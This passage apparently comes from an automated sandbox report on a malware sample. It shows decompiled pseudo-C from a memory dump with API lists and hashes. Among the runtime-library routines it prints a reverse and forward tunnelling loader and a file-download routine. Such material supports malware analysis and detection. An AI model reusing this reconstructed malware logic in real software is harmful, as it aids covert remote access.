                              								if(_t246 != 0) {
                              									_t162 = L0044471C(_t213, 0, 0, _v24);
                              									_t225 =  *((intOrPtr*)(0x46b800 + _t239 * 4));
                              									_t248 = _t249 + 0x10;
                              									_t240 = _v28;
                              									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                              									_t163 = _t246;
                              									 *(_t240 + _t225 + 0x24) = _t236;
                              									_t235 = _t240;
                              									_t223 = _v16;
                              									L21:
                              									_t241 = 0;
                              									_v40 = _t163;
                              									_t215 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
                              									_v36 = _t215;
                              									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                              									_t216 = _a4;
                              									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                              										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                              										_v6 = _t218;
                              										__eflags = _t218 - 0xa;
                              										_t216 = _a4;
                              										if(_t218 != 0xa) {
                              											__eflags = _t223;
                              											if(_t223 != 0) {
                              												_t241 = _v24;
                              												 *_t163 = _v6;
                              												_t216 = _a4;
                              												_t232 = _t223 - 1;
                              												__eflags = _v5;
                              												_v12 = _t163 + 1;
                              												_v16 = _t232;
                              												 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2a)) = 0xa;
                              												if(_v5 != 0) {
                              													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b));
                              													_v6 = _t191;
                              													__eflags = _t191 - 0xa;
                              													if(_t191 != 0xa) {
                              														__eflags = _t232;
                              														if(_t232 != 0) {
                              															_t192 = _v12;
                              															_t241 = 2;
                              															 *_t192 = _v6;
                              															_t216 = _a4;
                              															_t233 = _t232 - 1;
                              															_v12 = _t192 + 1;
                              															_v16 = _t233;
                              															 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2b)) = 0xa;
                              															__eflags = _v5 - _v24;
                              															if(_v5 == _v24) {
                              																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c));
                              																_v6 = _t199;
                              																__eflags = _t199 - 0xa;
                              																if(_t199 != 0xa) {
                              																	__eflags = _t233;
                              																	if(_t233 != 0) {
                              																		_t200 = _v12;
                              																		_t241 = 3;
                              																		 *_t200 = _v6;
                              																		_t216 = _a4;
                              																		_t234 = _t233 - 1;
                              																		__eflags = _t234;
                              																		_v12 = _t200 + 1;
                              																		_v16 = _t234;
                              																		 *((char*)(_t235 +  *((intOrPtr*)(0x46b800 + _v20 * 4)) + 0x2c)) = 0xa;
                              																	}
                              																}
                              															}
                              														}
                              													}
                              												}
                              											}
                              										}
                              									}
                              									_t164 = L0044D987(_t216);
                              									__eflags = _t164;
                              									if(_t164 == 0) {
                              										L41:
                              										_v24 = 0;
                              										L42:
                              										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
                              										__eflags = _t167;
                              										if(_t167 == 0) {
                              											L53:
                              											_t168 = GetLastError();
                              											_t241 = 5;
                              											__eflags = _t168 - _t241;
                              											if(_t168 != _t241) {
                              												__eflags = _t168 - 0x6d;
                              												if(_t168 != 0x6d) {
                              													L37:
                              													L00439DDE(_t168);
                              													goto L38;
                              												}
                              												_t242 = 0;
                              												goto L39;
                              											}
                              											 *((intOrPtr*)(L00439E14())) = 9;
                              											 *(L00439E01()) = _t241;
                              											goto L38;
                              										}
                              										_t229 = _a12;
                              										__eflags = _v36 - _t229;
                              										if(_v36 > _t229) {
                              											goto L53;
                              										}
                              										_t242 = _t241 + _v36;
                              										__eflags = _t242;
                              										L45:
                              										_t237 = _v28;
                              										_t175 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
                              										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                              										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                              											__eflags = _v5 - 2;
                              											if(_v5 == 2) {
                              												__eflags = _v24;
                              												_push(_t242 >> 1);
                              												_push(_v40);
                              												_push(_t216);
                              												if(_v24 == 0) {
                              													_t176 = L00444C43();
                              												} else {
                              													_t176 = L00444F53();
                              												}
                              											} else {
                              												_t230 = _t229 >> 1;
                              												__eflags = _t229 >> 1;
                              												_t176 = L00444E03(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                              											}
                              											_t242 = _t176;
                              										}
                              										goto L39;
                              									}
                              									_t231 = _v28;
                              									_t178 =  *((intOrPtr*)(0x46b800 + _v20 * 4));
                              									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                              									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                              										goto L41;
                              									}
                              									_t180 = GetConsoleMode(_v32,  &_v44);
                              									__eflags = _t180;
                              									if(_t180 == 0) {
                              										goto L41;
                              									}
                              									__eflags = _v5 - 2;
                              									if(_v5 != 2) {
                              										goto L42;
                              									}
                              									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                              									__eflags = _t184;
                              									if(_t184 != 0) {
                              										_t229 = _a12;
                              										_t242 = _t241 + _v36 * 2;
                              										goto L45;
                              									}
                              									_t168 = GetLastError();
                              									goto L37;
                              								} else {
                              									 *((intOrPtr*)(L00439E14())) = 0xc;
                              									 *(L00439E01()) = 8;
                              									L38:
                              									_t242 = _t241 | 0xffffffff;
                              									__eflags = _t242;
                              									L39:
                              									L0043EE85(_t246);
                              									return _t242;
                              								}
                              							}
                              							L15:
                              							 *(L00439E01()) =  *_t206 & _t246;
                              							 *((intOrPtr*)(L00439E14())) = 0x16;
                              							E0043626D();
                              							goto L38;
                              						}
                              						__eflags = _t155 != 1;
                              						if(_t155 != 1) {
                              							L13:
                              							_t163 = _a8;
                              							_v16 = _t223;
                              							_v12 = _t163;
                              							goto L21;
                              						}
                              						_t211 =  !_t223;
                              						__eflags = _t211 & 0x00000001;
                              						if((_t211 & 0x00000001) == 0) {
                              							goto L15;
                              						}
                              						goto L13;
                              					}
                              					L6:
                              					 *(L00439E01()) =  *_t151 & 0x00000000;
                              					 *((intOrPtr*)(L00439E14())) = 0x16;
                              					goto L59;
                              				} else {
                              					 *(L00439E01()) =  *_t212 & 0x00000000;
                              					_t145 = L00439E14();
                              					 *_t145 = 9;
                              					L60:
                              					return _t145 | 0xffffffff;
                              				}
                              			}

                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8fd86c6647246273acac44db2b30acb8fcf3bf49200610810839ec3576b6ec27
                              • Instruction ID: d415aa42f168db04541a2b881a195995a4068d2056edb743f6be97fc2ac4bfb3
                              • Opcode Fuzzy Hash: 8fd86c6647246273acac44db2b30acb8fcf3bf49200610810839ec3576b6ec27
                              • Instruction Fuzzy Hash: A1C10971D04749AFEF11DFA9C841BAEBBB4AF09304F18009AE8149B393D7789D41CB69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 65%
                              			E0040F248(char* __edx, void* __eflags, intOrPtr _a4) {
                              				char _v32;
                              				char _v56;
                              				void* _v60;
                              				char _v72;
                              				char _v76;
                              				char _v80;
                              				char _v88;
                              				char _v92;
                              				void* _v96;
                              				char _v108;
                              				char _v112;
                              				void* __ebx;
                              				void* __edi;
                              				void* __ebp;
                              				intOrPtr* _t23;
                              				void* _t29;
                              				char* _t32;
                              				intOrPtr _t45;
                              				char* _t46;
                              				char* _t53;
                              				char* _t58;
                              				intOrPtr _t110;
                              				void* _t114;
                              				void* _t115;
                              				char* _t117;
                              				void* _t118;
                              				void* _t119;
                              				void* _t121;
                              				signed int _t123;
                              				void* _t126;
                              				void* _t127;
                              				void* _t128;
                              				void* _t132;
                              
                              				_t134 = __eflags;
                              				_t101 = __edx;
                              				_push(_t61);
                              				_t110 = _a4;
                              				E004020CC(_t61,  &_v76, __edx, __eflags, _t110 + 0x1c);
                              				SetEvent( *(_t110 + 0x34));
                              				_t23 = L00401F75( &_v80);
                              				E00404286( &_v80,  &_v56, 4, 0xffffffff);
                              				_t126 = (_t123 & 0xfffffff8) - 0x3c;
                              				E004020CC(_t61, _t126, _t101, _t134, 0x46c238);
                              				_t127 = _t126 - 0x18;
                              				E004020CC(_t61, _t127, _t101, _t134,  &_v72);
                              				_t29 = L00416DD0( &_v112, _t101);
                              				_t128 = _t127 + 0x30;
                              				_t114 =  *_t23 - 0x46;
                              				if(_t114 == 0) {
                              					_t32 = E0040A15B(L00401F75(L00401E29( &_v88, _t101, __eflags, 1)));
                              					_t61 = _t32;
                              					__eflags = _t32;
                              					if(__eflags == 0) {
                              						_t115 = _t128 - 0x18;
                              						_push("1");
                              						L19:
                              						_t101 = L00402F97( &_v32, L00401E29( &_v88, _t101, __eflags, 0), 0x46c238);
                              						E0040530D(_t61, _t115, _t34, _t110, __eflags);
                              						_push(0x85);
                              						L00404A6E(_t61, _t110, _t34, __eflags);
                              						L00401FA7();
                              						L20:
                              						L00401E54( &_v108, _t101);
                              						L00401FA7();
                              						L00401FA7();
                              						return 0;
                              					}
                              					_t117 = E0040A1B1(_t61, "StartForward");
                              					 *0x46bd3c = _t117;
                              					 *0x46bd38 = E0040A1B1(_t61, "StartReverse");
                              					 *0x46bd40 = E0040A1B1(_t61, "StopForward");
                              					_t45 = E0040A1B1(_t61, "StopReverse");
                              					_t101 = "GetDirectListeningPort";
                              					 *0x46bd48 = _t45;
                              					_t46 = E0040A1B1(_t61, "GetDirectListeningPort");
                              					 *0x46bd44 = _t46;
                              					__eflags = _t117;
                              					if(__eflags == 0) {
                              						L17:
                              						_t115 = _t128 - 0x18;
                              						_push(0x45f6d0);
                              						goto L19;
                              					}
                              					__eflags =  *0x46bd38;
                              					if(__eflags == 0) {
                              						goto L17;
                              					}
                              					__eflags =  *0x46bd40;
                              					if(__eflags == 0) {
                              						goto L17;
                              					}
                              					__eflags = _t46;
                              					if(__eflags == 0) {
                              						goto L17;
                              					}
                              					 *0x46bd4c = 1;
                              					E004020CC(_t61, _t128 - 0x18, "GetDirectListeningPort", __eflags, L00401E29( &_v88, "GetDirectListeningPort", __eflags, 0));
                              					_push(0x76);
                              					L10:
                              					L00404A6E(_t61, _t110, _t101, __eflags);
                              					goto L20;
                              				}
                              				_t118 = _t114 - 1;
                              				if(_t118 == 0) {
                              					_t53 =  *0x46bd3c(E00436079(_t50, L00401F75(L00401E29( &_v88, _t101, __eflags, 0))));
                              					_t132 = _t128 - 0x14;
                              					L9:
                              					_t101 = _t53;
                              					L00416B7E(_t61, _t132, _t53);
                              					_push(0x77);
                              					goto L10;
                              				}
                              				_t119 = _t118 - 1;
                              				if(_t119 == 0) {
                              					__imp__#12( *0x46c774);
                              					_t58 =  *0x46bd38(_t29, E00436079(_t55, L00401F75(L00401E29( &_v92, _t101, __eflags, 0))) & 0x0000ffff);
                              					__eflags = _t58;
                              					_t99 =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
                              					 *0x46bd4d =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
                              					_t101 = _t58;
                              					L00416B7E(_t61, _t128 - 0x10, _t58);
                              					_push(0x78);
                              					goto L10;
                              				}
                              				_t121 = _t119 - 1;
                              				if(_t121 == 0) {
                              					_t53 =  *0x46bd40();
                              					_t132 = _t128 - 0x18;
                              					goto L9;
                              				}
                              				if(_t121 == 1) {
                              					 *0x46bd48();
                              					 *0x46bd4d = 0;
                              				}
                              				goto L20;
                              			}

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: Eventinet_ntoa
                              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                              • API String ID: 3578746661-168337528
                              • Opcode ID: a95b8ae20f3fd08dff746163321b5a77884589e7b86b1a448bab388508454adb
                              • Instruction ID: f9a444815650af3872de27879d45234466d6e45f99ea988061a4b43b2ad98d54
                              • Opcode Fuzzy Hash: a95b8ae20f3fd08dff746163321b5a77884589e7b86b1a448bab388508454adb
                              • Instruction Fuzzy Hash: 3351D631A043019BC714BB79DC5AA6E36A59B91318F40453FF801AB6E2EF7C994887DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 89%
                              			E0040628B(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
                              				intOrPtr _v8;
                              				char _v12;
                              				intOrPtr _v16;
                              				void* _v20;
                              				long _v24;
                              				char _v48;
                              				char _v72;
                              				void _v100076;
                              				void* __ebx;
                              				void* _t37;
                              				WCHAR* _t39;
                              				long _t46;
                              				struct _OVERLAPPED* _t58;
                              				intOrPtr _t77;
                              				long _t81;
                              				void* _t82;
                              				void* _t84;
                              				void* _t87;
                              
                              				L004505A0();
                              				_t74 =  &_a12;
                              				asm("xorps xmm0, xmm0");
                              				_v16 = __ecx;
                              				_t58 = 0;
                              				asm("movlpd [ebp-0x8], xmm0");
                              				_v24 = 0;
                              				E004032FA(0,  &_v48, __eflags, L00407516( &_v72,  &_a12, __eflags, L".part"));
                              				L00401ED0();
                              				_t37 = CreateFileW(L00401ECB( &_v48), 4, 0, 0, 2, 0x80, 0);
                              				_v20 = _t37;
                              				_t84 = _v8 - _a8;
                              				if(_t84 > 0) {
                              					L8:
                              					CloseHandle(_t37);
                              					_t39 = L00401ECB( &_a12);
                              					MoveFileW(L00401ECB( &_v48), _t39);
                              					_t58 = 1;
                              				} else {
                              					_t77 = _a4;
                              					if(_t84 < 0) {
                              						goto L3;
                              					} else {
                              						_t85 = _v12 - _t77;
                              						if(_v12 >= _t77) {
                              							goto L8;
                              						} else {
                              							while(1) {
                              								L3:
                              								_t46 = L00404B24( &_v100076, 0x186a0);
                              								_t81 = _t46;
                              								asm("cdq");
                              								_v12 = _v12 + _t46;
                              								asm("adc [ebp-0x4], edx");
                              								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
                              								_t82 = _t82 - 0x18;
                              								E0040208B(_t58, _t82, _t74, _t85,  &_v12, 8);
                              								L00404A6E(_t58, _v16, _t74, _t85, 0x57, _v16);
                              								if(_t81 <= 0) {
                              									break;
                              								}
                              								_t87 = _v8 - _a8;
                              								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
                              									continue;
                              								} else {
                              									_t37 = _v20;
                              									goto L8;
                              								}
                              								goto L9;
                              							}
                              							CloseHandle(_v20);
                              							DeleteFileW(L00401ECB( &_v48));
                              						}
                              					}
                              				}
                              				L9:
                              				L00401ED0();
                              				L00401ED0();
                              				return _t58;
                              			}

                              APIs
                                • Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531
                              • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 004062E4
                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 0040632C
                              • CloseHandle.KERNEL32(00000000), ref: 00406366
                              • MoveFileW.KERNEL32(00000000,00000000), ref: 0040637E
                              • CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 004063A2
                              • DeleteFileW.KERNEL32(00000000), ref: 004063B1
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
                              • String ID: .part
                              • API String ID: 820096542-3499674018
                              • Opcode ID: f3cb019698be5a900786293b9166b6942b5a3b98ed67e879c300892666d1ec9c
                              • Instruction ID: d9bd7d9a32dec13802f65ee1536d1b778e09315ea91cc40d0f5a3459ff757ad6
                              • Opcode Fuzzy Hash: f3cb019698be5a900786293b9166b6942b5a3b98ed67e879c300892666d1ec9c
                              • Instruction Fuzzy Hash: 10314971D00219AFCB10EFA5DD569EEB778FB44356F10847AF812B3191DA34AA44CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 69%
                              			E0044326D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                              				signed int _v8;
                              				int _v12;
                              				void* _v24;
                              				signed int _t49;
                              				signed int _t54;
                              				int _t58;
                              				signed int _t60;
                              				short* _t62;
                              				signed int _t66;
                              				short* _t70;
                              				int _t71;
                              				int _t78;
                              				short* _t81;
                              				signed int _t87;
                              				signed int _t90;
                              				void* _t95;
                              				void* _t96;
                              				int _t98;
                              				short* _t101;
                              				int _t103;
                              				signed int _t106;
                              				short* _t107;
                              				void* _t110;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t49 =  *0x46a00c; // 0x7df2b874
                              				_v8 = _t49 ^ _t106;
                              				_push(__esi);
                              				_t103 = _a20;
                              				if(_t103 > 0) {
                              					_t78 = L0043EE69(_a16, _t103);
                              					_t110 = _t78 - _t103;
                              					_t4 = _t78 + 1; // 0x1
                              					_t103 = _t4;
                              					if(_t110 >= 0) {
                              						_t103 = _t78;
                              					}
                              				}
                              				_t98 = _a32;
                              				if(_t98 == 0) {
                              					_t98 =  *( *_a4 + 8);
                              					_a32 = _t98;
                              				}
                              				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                              				_v12 = _t54;
                              				if(_t54 == 0) {
                              					L38:
                              					return L0042F61B(_v8 ^ _t106);
                              				} else {
                              					_t95 = _t54 + _t54;
                              					_t85 = _t95 + 8;
                              					asm("sbb eax, eax");
                              					if((_t95 + 0x00000008 & _t54) == 0) {
                              						_t81 = 0;
                              						__eflags = 0;
                              						L14:
                              						if(_t81 == 0) {
                              							L36:
                              							_t105 = 0;
                              							L37:
                              							L004304BD(_t81);
                              							goto L38;
                              						}
                              						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                              						_t121 = _t58;
                              						if(_t58 == 0) {
                              							goto L36;
                              						}
                              						_t100 = _v12;
                              						_t60 = E0044132F(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
                              						_t105 = _t60;
                              						if(_t105 == 0) {
                              							goto L36;
                              						}
                              						if((_a12 & 0x00000400) == 0) {
                              							_t96 = _t105 + _t105;
                              							_t87 = _t96 + 8;
                              							__eflags = _t96 - _t87;
                              							asm("sbb eax, eax");
                              							__eflags = _t87 & _t60;
                              							if((_t87 & _t60) == 0) {
                              								_t101 = 0;
                              								__eflags = 0;
                              								L30:
                              								__eflags = _t101;
                              								if(__eflags == 0) {
                              									L35:
                              									L004304BD(_t101);
                              									goto L36;
                              								}
                              								_t62 = E0044132F(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                              								__eflags = _t62;
                              								if(_t62 == 0) {
                              									goto L35;
                              								}
                              								_push(0);
                              								_push(0);
                              								__eflags = _a28;
                              								if(_a28 != 0) {
                              									_push(_a28);
                              									_push(_a24);
                              								} else {
                              									_push(0);
                              									_push(0);
                              								}
                              								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                              								__eflags = _t105;
                              								if(_t105 != 0) {
                              									L004304BD(_t101);
                              									goto L37;
                              								} else {
                              									goto L35;
                              								}
                              							}
                              							_t90 = _t96 + 8;
                              							__eflags = _t96 - _t90;
                              							asm("sbb eax, eax");
                              							_t66 = _t60 & _t90;
                              							_t87 = _t96 + 8;
                              							__eflags = _t66 - 0x400;
                              							if(_t66 > 0x400) {
                              								__eflags = _t96 - _t87;
                              								asm("sbb eax, eax");
                              								_t101 = L0043E61D(_t87, _t66 & _t87);
                              								_pop(_t87);
                              								__eflags = _t101;
                              								if(_t101 == 0) {
                              									goto L35;
                              								}
                              								 *_t101 = 0xdddd;
                              								L28:
                              								_t101 =  &(_t101[4]);
                              								goto L30;
                              							}
                              							__eflags = _t96 - _t87;
                              							asm("sbb eax, eax");
                              							E00450080();
                              							_t101 = _t107;
                              							__eflags = _t101;
                              							if(_t101 == 0) {
                              								goto L35;
                              							}
                              							 *_t101 = 0xcccc;
                              							goto L28;
                              						}
                              						_t70 = _a28;
                              						if(_t70 == 0) {
                              							goto L37;
                              						}
                              						_t125 = _t105 - _t70;
                              						if(_t105 > _t70) {
                              							goto L36;
                              						}
                              						_t71 = E0044132F(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                              						_t105 = _t71;
                              						if(_t71 != 0) {
                              							goto L37;
                              						}
                              						goto L36;
                              					}
                              					asm("sbb eax, eax");
                              					_t72 = _t54 & _t95 + 0x00000008;
                              					_t85 = _t95 + 8;
                              					if((_t54 & _t95 + 0x00000008) > 0x400) {
                              						__eflags = _t95 - _t85;
                              						asm("sbb eax, eax");
                              						_t81 = L0043E61D(_t85, _t72 & _t85);
                              						_pop(_t85);
                              						__eflags = _t81;
                              						if(__eflags == 0) {
                              							goto L36;
                              						}
                              						 *_t81 = 0xdddd;
                              						L12:
                              						_t81 =  &(_t81[4]);
                              						goto L14;
                              					}
                              					asm("sbb eax, eax");
                              					E00450080();
                              					_t81 = _t107;
                              					if(_t81 == 0) {
                              						goto L36;
                              					}
                              					 *_t81 = 0xcccc;
                              					goto L12;
                              				}
                              			}
                              0x00000000
                              0x00000000
                              0x00443390
                              0x00443392
                              0x00000000
                              0x00000000
                              0x004433a9
                              0x004433ae
                              0x004433b2
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004433b8
                              0x004432eb
                              0x004432ed
                              0x004432ef
                              0x004432f7
                              0x00443316
                              0x00443318
                              0x00443322
                              0x00443324
                              0x00443325
                              0x00443327
                              0x00000000
                              0x00000000
                              0x0044332d
                              0x00443333
                              0x00443333
                              0x00000000
                              0x00443333
                              0x004432fb
                              0x004432ff
                              0x00443304
                              0x00443308
                              0x00000000
                              0x00000000
                              0x0044330e
                              0x00000000
                              0x0044330e

                              APIs
                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 004432C7
                              • __alloca_probe_16.LIBCMT ref: 004432FF
                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 0044334D
                              • __alloca_probe_16.LIBCMT ref: 004433E4
                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00443447
                              • __freea.LIBCMT ref: 00443454
                                • Part of subcall function 0043E61D: HeapAlloc.KERNEL32(00000000,0042F939,?,?,00431057,?,?,0046C500,?,?,0040BA4E,0042F939,?,?,?,?), ref: 0043E64F
                              • __freea.LIBCMT ref: 0044345D
                              • __freea.LIBCMT ref: 00443482
                              Memory Dump Source
                              • Source File: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.937867942.000000000046F000.00000040.00000001.sdmp
                              Yara matches
                              Similarity
                              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                              • String ID:
                              • API String ID: 2597970681-0
                              • Opcode ID: 62498b2ee06e030f5c60595c331dd3b474f73ff538d16402fb36f2dd318d4ec5
                              • Instruction ID: 0cad5e9ef2b3b2de0836d9d1cfed8af2ee8cc4fd49053d42945b5b1fc1f44aaa
                              • Opcode Fuzzy Hash: 62498b2ee06e030f5c60595c331dd3b474f73ff538d16402fb36f2dd318d4ec5
                              • Instruction Fuzzy Hash: 1F511672A00216ABFB264E61DC41EEF77A9EB44B56F14466AFD04D6280DB3CDD408698
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E0043D1E1(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				signed int _v36;
                              				signed int _v40;
                              				intOrPtr _v44;
                              				signed int _v56;
                              				char _v276;
                              				short _v278;
                              				short _v280;
                              				char _v448;
                              				signed int _v452;
                              				signed int _v456;
                              				short _v458;
                              				intOrPtr _v460;
                              				intOrPtr _v464;
                              				signed int _v468;
                              				signed int _v472;
                              				intOrPtr _v508;
                              				char _v536;
                              				signed int _v540;
                              				intOrPtr _v544;
                              				signed int _v556;
                              				char _v708;
                              				signed int _v712;
                              				signed int _v716;
                              				short _v718;
                              				signed int* _v720;
                              				signed int _v724;
                              				signed int _v728;
                              				signed int _v732;
                              				signed int* _v736;
                              				signed int _v740;
                              				signed int _v744;
                              				signed int _v748;
                              				signed int _v752;
                              				char _v820;
                              				char _v1248;
                              				char _v1256;
                              				intOrPtr _v1276;
                              				signed int _v1292;
                              				signed int _t241;
                              				void* _t244;
                              				signed int _t247;
                              				signed int _t249;
                              				signed int _t255;
                              				signed int _t256;
                              				signed int _t257;
                              				signed int _t258;
                              				signed int _t259;
                              				signed int _t261;
                              				signed int _t263;
                              				void* _t265;
                              				signed int _t266;
                              				signed int _t267;
                              				signed int _t268;
                              				signed int _t270;
                              				signed int _t280;
                              				signed int _t281;
                              				signed int _t282;
                              				intOrPtr _t283;
                              				signed int _t286;
                              				signed int _t290;
                              				signed int _t291;
                              				signed int _t296;
                              				signed int _t299;
                              				signed int _t319;
                              				signed int _t320;
                              				signed int _t323;
                              				signed int _t328;
                              				void* _t330;
                              				signed int _t332;
                              				void* _t333;
                              				intOrPtr _t334;
                              				signed int _t339;
                              				signed int _t340;
                              				intOrPtr* _t343;
                              				signed int _t357;
                              				signed int _t359;
                              				signed int _t361;
                              				intOrPtr* _t362;
                              				signed int _t364;
                              				signed int _t370;
                              				intOrPtr* _t374;
                              				intOrPtr* _t377;
                              				void* _t380;
                              				intOrPtr* _t381;
                              				intOrPtr* _t382;
                              				signed int _t393;
                              				signed int _t396;
                              				intOrPtr* _t397;
                              				signed int _t399;
                              				signed int* _t403;
                              				intOrPtr* _t410;
                              				intOrPtr* _t411;
                              				signed int _t421;
                              				short _t422;
                              				void* _t424;
                              				signed int _t425;
                              				signed int _t427;
                              				intOrPtr _t428;
                              				signed int _t431;
                              				intOrPtr _t432;
                              				signed int _t434;
                              				signed int _t437;
                              				intOrPtr _t443;
                              				signed int _t444;
                              				signed int _t446;
                              				signed int _t447;
                              				signed int _t450;
                              				signed int _t452;
                              				signed int _t456;
                              				signed int* _t457;
                              				intOrPtr* _t458;
                              				short _t459;
                              				void* _t461;
                              				signed int _t463;
                              				signed int _t465;
                              				void* _t467;
                              				void* _t468;
                              				void* _t470;
                              				signed int _t471;
                              				void* _t472;
                              				void* _t474;
                              				signed int _t475;
                              				void* _t477;
                              				void* _t479;
                              				intOrPtr _t491;
                              
                              				_t420 = __edx;
                              				_t461 = _t467;
                              				_t468 = _t467 - 0xc;
                              				_push(__ebx);
                              				_push(__esi);
                              				_v12 = 1;
                              				_t357 = L0043E61D(__ecx, 0x6a6);
                              				_t240 = 0;
                              				_pop(_t370);
                              				if(_t357 == 0) {
                              					L20:
                              					return _t240;
                              				} else {
                              					_push(__edi);
                              					_t2 = _t357 + 4; // 0x4
                              					_t427 = _t2;
                              					 *_t427 = 0;
                              					 *_t357 = 1;
                              					_t443 = _a4;
                              					_t4 = _t443 + 0x30; // 0x43c9e0
                              					_t241 = _t4;
                              					_push( *_t241);
                              					_v16 = _t241;
                              					_push(0x457488);
                              					_push( *0x457344);
                              					E0043D120(_t357, _t370, __edx, _t427, _t443, _t427, 0x351, 3);
                              					_t470 = _t468 + 0x18;
                              					_v8 = 0x457344;
                              					while(1) {
                              						L2:
                              						_t244 = L00446DB7(_t427, 0x351, ";");
                              						_t471 = _t470 + 0xc;
                              						if(_t244 != 0) {
                              							break;
                              						} else {
                              							_t8 = _v16 + 0x10; // 0x10
                              							_t410 = _t8;
                              							_t339 =  *_v16;
                              							_v16 = _t410;
                              							_t411 =  *_t410;
                              							goto L4;
                              						}
                              						while(1) {
                              							L4:
                              							_t420 =  *_t339;
                              							if(_t420 !=  *_t411) {
                              								break;
                              							}
                              							if(_t420 == 0) {
                              								L8:
                              								_t340 = 0;
                              							} else {
                              								_t420 =  *((intOrPtr*)(_t339 + 2));
                              								if(_t420 !=  *((intOrPtr*)(_t411 + 2))) {
                              									break;
                              								} else {
                              									_t339 = _t339 + 4;
                              									_t411 = _t411 + 4;
                              									if(_t420 != 0) {
                              										continue;
                              									} else {
                              										goto L8;
                              									}
                              								}
                              							}
                              							L10:
                              							asm("sbb eax, eax");
                              							_t370 = _v8 + 0xc;
                              							_v8 = _t370;
                              							_v12 = _v12 &  !( ~_t340);
                              							_t343 = _v16;
                              							_v16 = _t343;
                              							_push( *_t343);
                              							_push(0x457488);
                              							_push( *_t370);
                              							E0043D120(_t357, _t370, _t420, _t427, _t443, _t427, 0x351, 3);
                              							_t470 = _t471 + 0x18;
                              							if(_v8 < 0x457374) {
                              								goto L2;
                              							} else {
                              								if(_v12 != 0) {
                              									L0043EE85(_t357);
                              									_t31 = _t443 + 0x28; // 0x30ff068b
                              									_t434 = _t427 | 0xffffffff;
                              									__eflags =  *_t31;
                              									if(__eflags != 0) {
                              										asm("lock xadd [ecx], eax");
                              										if(__eflags == 0) {
                              											_t32 = _t443 + 0x28; // 0x30ff068b
                              											L0043EE85( *_t32);
                              										}
